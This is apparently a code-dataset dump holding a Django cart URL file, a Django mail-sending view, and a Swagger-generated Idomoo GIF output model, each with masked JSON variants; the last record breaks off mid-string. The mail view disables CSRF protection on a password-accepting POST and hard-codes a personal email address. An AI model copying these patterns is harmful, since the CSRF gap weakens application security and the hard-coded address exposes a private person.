1,
2,
3,
4,
5
] |
from django.conf.urls import url
from cart import views
urlpatterns = [
    url(r'^add/$', views.cart_add, name='add'),            # add an item to the cart
    url(r'^count/$', views.cart_count, name='count'),      # get the number of items in the cart
    url(r'^del/$', views.cart_del, name='delete'),         # delete a cart entry
    # BUG FIX: pattern was missing the leading '^' anchor.
    url(r'^update/$', views.cart_update, name='update'),   # update the quantity of a cart item
    # BUG FIX: pattern was r'^&', which can never match a normal request
    # path; the cart page is served at the app root.
    url(r'^$', views.cart_show, name='show'),              # show the user's cart page
]
|
normal
|
{
"blob_id": "5b3a6b44bd9ea80da1983d8254c73bba3e2338e1",
"index": 5166,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns = [url('^add/$', views.cart_add, name='add'), url('^count/$',\n views.cart_count, name='count'), url('^del/$', views.cart_del, name=\n 'delete'), url('update/$', views.cart_update, name='update'), url('^&',\n views.cart_show, name='show')]\n",
"step-3": "from django.conf.urls import url\nfrom cart import views\nurlpatterns = [url('^add/$', views.cart_add, name='add'), url('^count/$',\n views.cart_count, name='count'), url('^del/$', views.cart_del, name=\n 'delete'), url('update/$', views.cart_update, name='update'), url('^&',\n views.cart_show, name='show')]\n",
"step-4": "from django.conf.urls import url \nfrom cart import views\n\nurlpatterns=[\n url(r'^add/$',views.cart_add,name='add'),#t添加购物车数据\n url(r'^count/$',views.cart_count,name='count'),#huo获取购物车商品数量\n url(r'^del/$',views.cart_del,name='delete'),#删除购物车商品记录\n url(r'update/$',views.cart_update,name='update'),#更新购物车商品数目\n url(r'^&',views.cart_show,name='show'),#显示用户购物车页面\n\n]\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
# Create your views here.
from projects.models import Project
from django.db import connection
from .utils import namedtuplefetchall
from django.http import JsonResponse
from django.contrib import messages
import json
from django.views.decorators.csrf import csrf_exempt
from .utils import send_mail
from DBMS import settings
from passlib.hash import pbkdf2_sha256 as encrypto
# Create your views here.
@login_required
@csrf_exempt
def social(request):
    """Social-media mailing view.

    GET: render 'social/index.html' with the projects the logged-in user
    works on.
    POST: look up the manager/customer of the posted project, then e-mail
    the composed message, guarded by the mail-account password.
    """
    if request.method == "POST":
        data = request.POST
        # All POSTed fields arrive JSON-encoded; decode each one.
        project_id = int(json.loads(data.get('projid')))
        head = data.get('head')
        head = json.loads(head)
        subhead = json.loads(data.get('subh'))
        content = json.loads(data.get('cont'))
        obtained = json.loads(data.get('pass'))  # password typed by the user
        with connection.cursor() as curr:
            # Parameterized query (%s placeholder) - safe against injection.
            curr.execute("SELECT manager_id,customer_id FROM socialMedia where project_id=%s",[project_id])
            rec_id = namedtuplefetchall(curr)
            manager_id = rec_id[0].manager_id  # NOTE(review): currently unused
            customer_id = rec_id[0].customer_id
            print("SENDING")
        with connection.cursor() as curr:
            curr.execute("select contact from customer where customer_id = %s",[customer_id])
            email = namedtuplefetchall(curr)
            customer_email = email[0].contact
        # NOTE(review): the mail below goes to a hard-coded address; swap in
        # customer_email once real customer data is available.
        pwd = settings.EMAIL_HOST_PASSWORD
        # Only send when the typed password verifies against the stored hash.
        if encrypto.verify(obtained,pwd) == True:
            send_mail(head,subhead+'\n'+content,'Gauri Baraskar','gauribaraskar812@gmail.com',settings.EMAIL_HOST_USER,obtained)
        else:
            messages.warning(request,"Wrong Password Entered")
        return JsonResponse(1,safe=False)
    else:
        with connection.cursor() as curr:
            curr.execute("select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id",[request.user.id])
            res = namedtuplefetchall(curr)
        return render(request, 'social/index.html', {'social': res})
|
normal
|
{
"blob_id": "c2839046592469dfae7526f72be947126960ba19",
"index": 621,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@login_required\n@csrf_exempt\ndef social(request):\n if request.method == 'POST':\n data = request.POST\n project_id = int(json.loads(data.get('projid')))\n head = data.get('head')\n head = json.loads(head)\n subhead = json.loads(data.get('subh'))\n content = json.loads(data.get('cont'))\n obtained = json.loads(data.get('pass'))\n with connection.cursor() as curr:\n curr.execute(\n 'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'\n , [project_id])\n rec_id = namedtuplefetchall(curr)\n manager_id = rec_id[0].manager_id\n customer_id = rec_id[0].customer_id\n print('SENDING')\n with connection.cursor() as curr:\n curr.execute('select contact from customer where customer_id = %s',\n [customer_id])\n email = namedtuplefetchall(curr)\n customer_email = email[0].contact\n pwd = settings.EMAIL_HOST_PASSWORD\n if encrypto.verify(obtained, pwd) == True:\n send_mail(head, subhead + '\\n' + content, 'Gauri Baraskar',\n 'gauribaraskar812@gmail.com', settings.EMAIL_HOST_USER,\n obtained)\n else:\n messages.warning(request, 'Wrong Password Entered')\n return JsonResponse(1, safe=False)\n else:\n with connection.cursor() as curr:\n curr.execute(\n 'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'\n , [request.user.id])\n res = namedtuplefetchall(curr)\n return render(request, 'social/index.html', {'social': res})\n",
"step-3": "from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\nfrom projects.models import Project\nfrom django.db import connection\nfrom .utils import namedtuplefetchall\nfrom django.http import JsonResponse\nfrom django.contrib import messages\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\nfrom .utils import send_mail\nfrom DBMS import settings\nfrom passlib.hash import pbkdf2_sha256 as encrypto\n\n\n@login_required\n@csrf_exempt\ndef social(request):\n if request.method == 'POST':\n data = request.POST\n project_id = int(json.loads(data.get('projid')))\n head = data.get('head')\n head = json.loads(head)\n subhead = json.loads(data.get('subh'))\n content = json.loads(data.get('cont'))\n obtained = json.loads(data.get('pass'))\n with connection.cursor() as curr:\n curr.execute(\n 'SELECT manager_id,customer_id FROM socialMedia where project_id=%s'\n , [project_id])\n rec_id = namedtuplefetchall(curr)\n manager_id = rec_id[0].manager_id\n customer_id = rec_id[0].customer_id\n print('SENDING')\n with connection.cursor() as curr:\n curr.execute('select contact from customer where customer_id = %s',\n [customer_id])\n email = namedtuplefetchall(curr)\n customer_email = email[0].contact\n pwd = settings.EMAIL_HOST_PASSWORD\n if encrypto.verify(obtained, pwd) == True:\n send_mail(head, subhead + '\\n' + content, 'Gauri Baraskar',\n 'gauribaraskar812@gmail.com', settings.EMAIL_HOST_USER,\n obtained)\n else:\n messages.warning(request, 'Wrong Password Entered')\n return JsonResponse(1, safe=False)\n else:\n with connection.cursor() as curr:\n curr.execute(\n 'select project.project_id,project_name from works_on,project where user_id=%s and project.project_id=works_on.project_id'\n , [request.user.id])\n res = namedtuplefetchall(curr)\n return render(request, 'social/index.html', {'social': res})\n",
"step-4": "from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.csrf import csrf_exempt\n# Create your views here.\nfrom projects.models import Project\nfrom django.db import connection\nfrom .utils import namedtuplefetchall\nfrom django.http import JsonResponse\nfrom django.contrib import messages\nimport json\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .utils import send_mail\n\nfrom DBMS import settings\n\nfrom passlib.hash import pbkdf2_sha256 as encrypto\n\n# Create your views here.\n\n@login_required\n@csrf_exempt\ndef social(request):\n if request.method == \"POST\":\n data = request.POST\n project_id = int(json.loads(data.get('projid')))\n head = data.get('head')\n head = json.loads(head)\n subhead = json.loads(data.get('subh'))\n content = json.loads(data.get('cont'))\n obtained = json.loads(data.get('pass'))\n with connection.cursor() as curr:\n curr.execute(\"SELECT manager_id,customer_id FROM socialMedia where project_id=%s\",[project_id])\n rec_id = namedtuplefetchall(curr)\n manager_id = rec_id[0].manager_id\n customer_id = rec_id[0].customer_id\n print(\"SENDING\")\n\n with connection.cursor() as curr:\n curr.execute(\"select contact from customer where customer_id = %s\",[customer_id])\n email = namedtuplefetchall(curr)\n customer_email = email[0].contact\n\n # Rename the email field with customer_email to send to customers when we have actual data\n\n pwd = settings.EMAIL_HOST_PASSWORD\n if encrypto.verify(obtained,pwd) == True:\n #print(\"asjdhasd\")\n send_mail(head,subhead+'\\n'+content,'Gauri Baraskar','gauribaraskar812@gmail.com',settings.EMAIL_HOST_USER,obtained)\n else:\n messages.warning(request,\"Wrong Password Entered\")\n return JsonResponse(1,safe=False)\n\n else:\n with connection.cursor() as curr:\n curr.execute(\"select project.project_id,project_name from works_on,project where user_id=%s and 
project.project_id=works_on.project_id\",[request.user.id])\n res = namedtuplefetchall(curr)\n return render(request, 'social/index.html', {'social': res})\n\n\n\n\n\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# coding: utf-8
"""
Idomoo API
OpenAPI spec version: 2.0
Contact: dev.support@idomoo.com
"""
import pprint
import six
class GIFOutput(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'gif_fps': 'float',
'color_depth': 'float',
'gif_loop': 'int',
'height': 'float',
'start': 'float',
'duration': 'float',
'suffix': 'str',
'overlay': 'str',
'overlay_alignment': 'list[str]',
'overlay_scale': 'str',
'label': 'str'
}
attribute_map = {
'gif_fps': 'gif_fps',
'color_depth': 'color_depth',
'gif_loop': 'gif_loop',
'height': 'height',
'start': 'start',
'duration': 'duration',
'suffix': 'suffix',
'overlay': 'overlay',
'overlay_alignment': 'overlay_alignment',
'overlay_scale': 'overlay_scale',
'label': 'label'
}
    def __init__(self, gif_fps=None, color_depth=None, gif_loop=None, height=None, start=None, duration=None,
                 suffix=None, overlay=None, overlay_alignment=None, overlay_scale='fit', label=None):
        """GIFOutput - a model defined in Swagger.

        Initializes every private backing field to None, then applies only
        the arguments that were supplied.  ``height`` and ``start`` are
        required: they are assigned unconditionally and their setters raise
        ValueError when given None.
        """
        # Backing fields for the properties below; None means "not set".
        self._gif_fps = None
        self._color_depth = None
        self._gif_loop = None
        self._height = None
        self._start = None
        self._duration = None
        self._suffix = None
        self._overlay = None
        self._overlay_alignment = None
        self._overlay_scale = None
        self._label = None
        self.discriminator = None
        if gif_fps is not None:
            self.gif_fps = gif_fps
        if color_depth is not None:
            self.color_depth = color_depth
        if gif_loop is not None:
            self.gif_loop = gif_loop
        # Required fields: assigned through their setters, which reject None.
        self.height = height
        self.start = start
        if duration is not None:
            self.duration = duration
        if suffix is not None:
            self.suffix = suffix
        if overlay is not None:
            self.overlay = overlay
        if overlay_alignment is not None:
            self.overlay_alignment = overlay_alignment
        if overlay_scale is not None:
            self.overlay_scale = overlay_scale
        if label is not None:
            self.label = label
    @property
    def gif_fps(self):
        """Gets the gif_fps of this GIFOutput.

        The frame rate of the GIF.  Defaults to the video frame rate when
        left unset (None).

        :return: The gif_fps of this GIFOutput.
        :rtype: float
        """
        return self._gif_fps

    @gif_fps.setter
    def gif_fps(self, gif_fps):
        """Sets the gif_fps of this GIFOutput.

        The frame rate of the GIF.  Defaults to the video frame rate when
        left unset (None).

        :param gif_fps: The gif_fps of this GIFOutput.
        :type: float
        :raises ValueError: if gif_fps is greater than 30
        """
        # API constraint: GIF frame rate may not exceed 30 fps.
        if gif_fps is not None and gif_fps > 30:
            raise ValueError("Invalid value for `gif_fps`, must be a value less than or equal to `30`")

        self._gif_fps = gif_fps
    @property
    def color_depth(self):
        """Gets the color_depth of this GIFOutput.

        Amount of colors in the GIF palette.

        :return: The color_depth of this GIFOutput.
        :rtype: float
        """
        return self._color_depth

    @color_depth.setter
    def color_depth(self, color_depth):
        """Sets the color_depth of this GIFOutput.

        Amount of colors in the GIF palette.  No validation is applied here.

        :param color_depth: The color_depth of this GIFOutput.
        :type: float
        """
        self._color_depth = color_depth
    @property
    def gif_loop(self):
        """Gets the gif_loop of this GIFOutput.

        Loop behaviour: -1 is no loop, 0 is infinite loops, any other
        number is the exact loop count.

        :return: The gif_loop of this GIFOutput.
        :rtype: int
        """
        return self._gif_loop

    @gif_loop.setter
    def gif_loop(self, gif_loop):
        """Sets the gif_loop of this GIFOutput.

        Loop behaviour: -1 is no loop, 0 is infinite loops, any other
        number is the exact loop count.

        :param gif_loop: The gif_loop of this GIFOutput.
        :type: int
        :raises ValueError: if gif_loop is less than -1
        """
        # -1 is the smallest meaningful value (play once, no loop).
        if gif_loop is not None and gif_loop < -1:
            raise ValueError("Invalid value for `gif_loop`, must be a value greater than or equal to `-1`")

        self._gif_loop = gif_loop
    @property
    def height(self):
        """Gets the height of this GIFOutput.

        Height of the media to be rendered, in pixels.  Should be the height
        of your scenes unless a smaller resolution is needed; resolution
        higher than the scene resolution reduces quality.  The width is
        automatically calculated to keep the aspect ratio.

        :return: The height of this GIFOutput.
        :rtype: float
        """
        return self._height

    @height.setter
    def height(self, height):
        """Sets the height of this GIFOutput.

        Height of the media to be rendered, in pixels (required field).
        The width is automatically calculated to keep the aspect ratio.

        :param height: The height of this GIFOutput.
        :type: float
        :raises ValueError: if height is None (the field is required)
        """
        if height is None:
            raise ValueError("Invalid value for `height`, must not be `None`")

        self._height = height
@property
def start(self):
    """Second of the storyboard timeline at which the GIF starts.

    :return: The start of this GIFOutput.
    :rtype: float
    """
    return self._start

@start.setter
def start(self, start):
    """Set the storyboard-timeline second at which the GIF starts.

    This field is required.

    :param start: The start of this GIFOutput.
    :type: float
    :raises ValueError: if start is None (the field is mandatory).
    """
    if start is None:
        raise ValueError("Invalid value for `start`, must not be `None`")
    self._start = start
@property
def duration(self):
    """Duration of the GIF in seconds (cannot exceed the video length).

    :return: The duration of this GIFOutput.
    :rtype: float
    """
    return self._duration

@duration.setter
def duration(self, duration):
    """Set the duration of the GIF in seconds.

    Cannot be longer than the video; no client-side validation is done.

    :param duration: The duration of this GIFOutput.
    :type: float
    """
    self._duration = duration
@property
def suffix(self):
    """Unique file-name ending used to tell several outputs apart.

    Required when more than one video output is configured.

    :return: The suffix of this GIFOutput.
    :rtype: str
    """
    return self._suffix

@suffix.setter
def suffix(self, suffix):
    """Set the unique file-name ending for this output.

    Required when more than one video output is configured.

    :param suffix: The suffix of this GIFOutput.
    :type: str
    """
    self._suffix = suffix
@property
def overlay(self):
    """Path to an overlay image, e.g. a play button or watermark.

    :return: The overlay of this GIFOutput.
    :rtype: str
    """
    return self._overlay

@overlay.setter
def overlay(self, overlay):
    """Set the path to the overlay image (play button, watermark, ...).

    :param overlay: The overlay of this GIFOutput.
    :type: str
    """
    self._overlay = overlay
@property
def overlay_alignment(self):
    """Alignment of the overlay image when it does not fit the video exactly.

    A two-element list: the first item is the X alignment, the second is Y.

    :return: The overlay_alignment of this GIFOutput.
    :rtype: list[str]
    """
    return self._overlay_alignment

@overlay_alignment.setter
def overlay_alignment(self, overlay_alignment):
    """Set the alignment of the overlay image.

    A two-element list: the first item is the X alignment, the second is Y.
    Each entry must be one of "left", "center", "right", "top", "middle",
    "bottom".

    :param overlay_alignment: The overlay_alignment of this GIFOutput.
    :type: list[str]
    :raises ValueError: if any entry is not an allowed alignment keyword.
    """
    allowed_values = ["left", "center", "right", "top", "middle", "bottom"]
    # Fix: guard against None before converting to a set. Other optional
    # setters on this model (gif_fps, gif_loop) accept None; without this
    # guard, set(None) raised TypeError instead.
    if overlay_alignment is not None and not set(overlay_alignment).issubset(set(allowed_values)):
        raise ValueError(
            "Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]"
            .format(", ".join(map(str, set(overlay_alignment) - set(allowed_values))),
                    ", ".join(map(str, allowed_values)))
        )
    self._overlay_alignment = overlay_alignment
@property
def overlay_scale(self):
    """How the overlay image is resized when it differs from the video size.

    * Fit: scale up/down so the whole image is visible; mismatched aspect
      ratios get transparent padding per the alignment settings.
    * Fill: scale up/down so the image covers the whole video; mismatched
      aspect ratios get cropped per the alignment settings.
    * None: leave the overlay image at its original size.

    :return: The overlay_scale of this GIFOutput.
    :rtype: str
    """
    return self._overlay_scale

@overlay_scale.setter
def overlay_scale(self, overlay_scale):
    """Set how the overlay image is resized ("fit", "fill" or "none").

    :param overlay_scale: The overlay_scale of this GIFOutput.
    :type: str
    :raises ValueError: if the value is not one of the allowed modes.
    """
    permitted = ["fit", "fill", "none"]
    if overlay_scale not in permitted:
        raise ValueError(
            "Invalid value for `overlay_scale` ({0}), must be one of {1}"
            .format(overlay_scale, permitted)
        )
    self._overlay_scale = overlay_scale
@property
def label(self):
    """Alternate identifier for this output.

    The label is echoed back in the API response but never appears in
    the generated file name.

    :return: The label of this GIFOutput.
    :rtype: str
    """
    return self._label

@label.setter
def label(self, label):
    """Set the alternate identifier for this output.

    Returned in the API response; not part of the file name.

    :param label: The label of this GIFOutput.
    :type: str
    """
    self._label = label
def to_dict(self):
    """Return the model's properties as a plain dict.

    Nested models (anything exposing a ``to_dict`` method) are converted
    recursively, including models stored inside lists and dict values.

    :return: mapping of attribute name to its plain-Python value.
    :rtype: dict
    """
    result = {}
    # swagger_types keys are the declared attribute names of the model.
    for attr in self.swagger_types:
        value = getattr(self, attr)
        if isinstance(value, list):
            result[attr] = [
                item.to_dict() if hasattr(item, "to_dict") else item
                for item in value
            ]
        elif hasattr(value, "to_dict"):
            result[attr] = value.to_dict()
        elif isinstance(value, dict):
            result[attr] = {
                k: (v.to_dict() if hasattr(v, "to_dict") else v)
                for k, v in value.items()
            }
        else:
            result[attr] = value
    return result
def to_str(self):
    """Return a pretty-printed string representation of the model.

    :rtype: str
    """
    as_dict = self.to_dict()
    return pprint.pformat(as_dict)
def __repr__(self):
    """Use the pretty-printed dict form for `print` and `pprint`."""
    return self.to_str()
def __eq__(self, other):
    """Two GIFOutput instances are equal when all attributes match."""
    if isinstance(other, GIFOutput):
        return self.__dict__ == other.__dict__
    # Different type: never equal (mirrors the generated-model convention).
    return False
def __ne__(self, other):
    """Return True when the two objects are not equal (inverse of ``==``)."""
    equal = self == other
    return not equal
|
normal
|
{
"blob_id": "2362c9a12f97f32f6136aaf16a55cf4acbaf9294",
"index": 4753,
"step-1": "<mask token>\n\n\nclass GIFOutput(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. 
Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n <mask token>\n\n @height.setter\n def height(self, height):\n \"\"\"Sets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. 
The width is automatically\n calculated to keep the aspect ratio.\n\n :param height: The height of this GIFOutput.\n :type: float\n \"\"\"\n if height is None:\n raise ValueError('Invalid value for `height`, must not be `None`')\n self._height = height\n\n @property\n def start(self):\n \"\"\"Gets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :return: The start of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._start\n\n @start.setter\n def start(self, start):\n \"\"\"Sets the start of this GIFOutput.\n\n What second of the storyboard timeline to start the GIF.\n\n :param start: The start of this GIFOutput.\n :type: float\n \"\"\"\n if start is None:\n raise ValueError('Invalid value for `start`, must not be `None`')\n self._start = start\n\n @property\n def duration(self):\n \"\"\"Gets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :return: The duration of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._duration\n\n @duration.setter\n def duration(self, duration):\n \"\"\"Sets the duration of this GIFOutput.\n\n Seconds for the duration of the GIF. Can't be longer than the video.\n\n :param duration: The duration of this GIFOutput.\n :type: float\n \"\"\"\n self._duration = duration\n\n @property\n def suffix(self):\n \"\"\"Gets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. Required if there is more\n then 1 video output.\n\n :return: The suffix of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._suffix\n\n @suffix.setter\n def suffix(self, suffix):\n \"\"\"Sets the suffix of this GIFOutput.\n\n Unique ending of the file name so several outputs can be created then identified. 
Required if there is more\n then 1 video output.\n\n :param suffix: The suffix of this GIFOutput.\n :type: str\n \"\"\"\n self._suffix = suffix\n\n @property\n def overlay(self):\n \"\"\"Gets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :return: The overlay of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay\n\n @overlay.setter\n def overlay(self, overlay):\n \"\"\"Sets the overlay of this GIFOutput.\n\n Path to overlay image, such as: play button or watermark.\n\n :param overlay: The overlay of this GIFOutput.\n :type: str\n \"\"\"\n self._overlay = overlay\n\n @property\n def overlay_alignment(self):\n \"\"\"Gets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :return: The overlay_alignment of this GIFOutput.\n :rtype: list[str]\n \"\"\"\n return self._overlay_alignment\n\n @overlay_alignment.setter\n def overlay_alignment(self, overlay_alignment):\n \"\"\"Sets the overlay_alignment of this GIFOutput.\n\n Alignment for overlay image in case the image doesn't fit the video perfectly. The first item in the array is\n X. The second is Y.\n\n :param overlay_alignment: The overlay_alignment of this GIFOutput.\n :type: list[str]\n \"\"\"\n allowed_values = ['left', 'center', 'right', 'top', 'middle', 'bottom']\n if not set(overlay_alignment).issubset(set(allowed_values)):\n raise ValueError(\n 'Invalid values for `overlay_alignment` [{0}], must be a subset of [{1}]'\n .format(', '.join(map(str, set(overlay_alignment) - set(\n allowed_values))), ', '.join(map(str, allowed_values))))\n self._overlay_alignment = overlay_alignment\n\n @property\n def overlay_scale(self):\n \"\"\"Gets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. 
If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :return: The overlay_scale of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._overlay_scale\n\n @overlay_scale.setter\n def overlay_scale(self, overlay_scale):\n \"\"\"Sets the overlay_scale of this GIFOutput.\n\n Scale the overlay image if it's not the same size as the video. * Fit: scale the image up or down so it's\n completely visible in the video's resolution. If not the same aspect ratio, transparency is added around the\n image according to the alignment settings. * Fill: scale the image up or down so it completely fills the\n video. If not the same aspect ratio, the image is cropped according to the alignment settings. * None: don't\n resize the overlay image.\n\n :param overlay_scale: The overlay_scale of this GIFOutput.\n :type: str\n \"\"\"\n allowed_values = ['fit', 'fill', 'none']\n if overlay_scale not in allowed_values:\n raise ValueError(\n 'Invalid value for `overlay_scale` ({0}), must be one of {1}'\n .format(overlay_scale, allowed_values))\n self._overlay_scale = overlay_scale\n\n @property\n def label(self):\n \"\"\"Gets the label of this GIFOutput.\n\n This label is another way to identify this specific output. The label is returned in the response,\n but does not appear in the file name.\n\n :return: The label of this GIFOutput.\n :rtype: str\n \"\"\"\n return self._label\n\n @label.setter\n def label(self, label):\n \"\"\"Sets the label of this GIFOutput.\n\n This label is another way to identify this specific output. 
The label is returned in the response,\n but does not appear in the file name.\n\n :param label: The label of this GIFOutput.\n :type: str\n \"\"\"\n self._label = label\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(lambda x: x.to_dict() if hasattr(x,\n 'to_dict') else x, value))\n elif hasattr(value, 'to_dict'):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(lambda item: (item[0], item[1].\n to_dict()) if hasattr(item[1], 'to_dict') else item,\n value.items()))\n else:\n result[attr] = value\n return result\n <mask token>\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, GIFOutput):\n return False\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n",
"step-2": "<mask token>\n\n\nclass GIFOutput(object):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, gif_fps=None, color_depth=None, gif_loop=None,\n height=None, start=None, duration=None, suffix=None, overlay=None,\n overlay_alignment=None, overlay_scale='fit', label=None):\n \"\"\"GIFOutput - a model defined in Swagger\"\"\"\n self._gif_fps = None\n self._color_depth = None\n self._gif_loop = None\n self._height = None\n self._start = None\n self._duration = None\n self._suffix = None\n self._overlay = None\n self._overlay_alignment = None\n self._overlay_scale = None\n self._label = None\n self.discriminator = None\n if gif_fps is not None:\n self.gif_fps = gif_fps\n if color_depth is not None:\n self.color_depth = color_depth\n if gif_loop is not None:\n self.gif_loop = gif_loop\n self.height = height\n self.start = start\n if duration is not None:\n self.duration = duration\n if suffix is not None:\n self.suffix = suffix\n if overlay is not None:\n self.overlay = overlay\n if overlay_alignment is not None:\n self.overlay_alignment = overlay_alignment\n if overlay_scale is not None:\n self.overlay_scale = overlay_scale\n if label is not None:\n self.label = label\n\n @property\n def gif_fps(self):\n \"\"\"Gets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. Default is the Video frame rate\n\n :return: The gif_fps of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._gif_fps\n\n @gif_fps.setter\n def gif_fps(self, gif_fps):\n \"\"\"Sets the gif_fps of this GIFOutput.\n\n The frame rate of the GIF. 
Default is the Video frame rate\n\n :param gif_fps: The gif_fps of this GIFOutput.\n :type: float\n \"\"\"\n if gif_fps is not None and gif_fps > 30:\n raise ValueError(\n 'Invalid value for `gif_fps`, must be a value less than or equal to `30`'\n )\n self._gif_fps = gif_fps\n\n @property\n def color_depth(self):\n \"\"\"Gets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :return: The color_depth of this GIFOutput.\n :rtype: float\n \"\"\"\n return self._color_depth\n\n @color_depth.setter\n def color_depth(self, color_depth):\n \"\"\"Sets the color_depth of this GIFOutput.\n\n Amount of colors in palette\n\n :param color_depth: The color_depth of this GIFOutput.\n :type: float\n \"\"\"\n self._color_depth = color_depth\n\n @property\n def gif_loop(self):\n \"\"\"Gets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :return: The gif_loop of this GIFOutput.\n :rtype: int\n \"\"\"\n return self._gif_loop\n\n @gif_loop.setter\n def gif_loop(self, gif_loop):\n \"\"\"Sets the gif_loop of this GIFOutput.\n\n If to loop the GIF. -1 is no loop, 0 is infinite loops, and other numbers are number of loops.\n\n :param gif_loop: The gif_loop of this GIFOutput.\n :type: int\n \"\"\"\n if gif_loop is not None and gif_loop < -1:\n raise ValueError(\n 'Invalid value for `gif_loop`, must be a value greater than or equal to `-1`'\n )\n self._gif_loop = gif_loop\n\n @property\n def height(self):\n \"\"\"Gets the height of this GIFOutput.\n\n Height of the media to be rendered, in pixels. Should be the height of your scenes unless a smaller\n resolution is needed. Resolution higher than the scene resolution reduces quality. 
